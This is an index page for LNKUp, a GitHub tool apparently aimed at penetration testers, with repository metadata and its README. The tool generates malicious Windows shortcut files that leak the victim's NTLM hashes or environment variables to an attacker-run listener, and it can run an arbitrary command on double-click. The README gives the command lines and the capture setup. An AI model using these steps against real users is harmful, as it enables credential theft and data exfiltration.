Ecosyste.ms: Awesome
An open API service indexing awesome lists of open source software.
https://github.com/plazmaz/lnkup
Generates malicious LNK file payloads for data exfiltration
Last synced: 7 days ago
- Host: GitHub
- URL: https://github.com/plazmaz/lnkup
- Owner: Plazmaz
- Created: 2017-08-09T16:18:07.000Z (over 7 years ago)
- Default Branch: master
- Last Pushed: 2017-08-21T22:58:13.000Z (over 7 years ago)
- Last Synced: 2025-01-08T13:18:53.930Z (14 days ago)
- Topics: data-exfiltration, lnk, lnk-payloads, microsoft, ntlm, payload, penetration-testing, pentesting, security, usb, windows
- Language: Python
- Size: 9.77 KB
- Stars: 357
- Watchers: 17
- Forks: 53
- Open Issues: 0
Metadata Files:
- Readme: README.md
README
# LNKUp
LNK Data exfiltration payload generator
---
This tool will allow you to generate LNK payloads. Upon rendering or being run, they will exfiltrate data.

## Info
**I am not responsible for any actions you take with this tool!**
You can contact me with any questions by opening an issue, or via my Twitter, [@Plazmaz](https://www.twitter.com/Plazmaz).

## Known gotchas
* This tool will not work on OSX or Linux machines. It is specifically designed to target Windows.
* There may be issues with icon caching in some situations. If your payload doesn't execute after the first time, try regenerating it.
* You will need to run a responder or [metasploit module](https://www.rapid7.com/db/modules/auxiliary/server/capture/smb) server to capture NTLM hashes.
* To capture environment variables, you'll need to run a webserver like apache, nginx, or even just [this](https://gist.github.com/Plazmaz/cafd0bd3a3a4471446cc8fe6e4f0c036)

## Installation
Install requirements using
`pip install -r requirements.txt`

## Usage
#### Payload types:
* NTLM
    * Steals the user's NTLM hash when rendered.
    * Needs listener server such as this [metasploit module](https://www.rapid7.com/db/modules/auxiliary/server/capture/smb)
    * More on NTLM hashes leaking: [https://dylankatz.com/NTLM-Hashes-Microsoft's-Ancient-Design-Flaw/](https://dylankatz.com/NTLM-Hashes-Microsoft's-Ancient-Design-Flaw/?utm_source=github_lnkup)
    * Example usage:
      `lnkup.py --host localhost --type ntlm --output out.lnk`
* Environment
    * Steals the user's environment variables.
    * Examples: %PATH%, %USERNAME%, etc
    * Requires variables to be set using --vars
    * Example usage:
      `lnkup.py --host localhost --type environment --vars PATH USERNAME JAVA_HOME --output out.lnk`
#### Extra:
* Use `--execute` to specify a command to run when the shortcut is double clicked
    * Example:
      `lnkup.py --host localhost --type ntlm --output out.lnk --execute "shutdown /s"`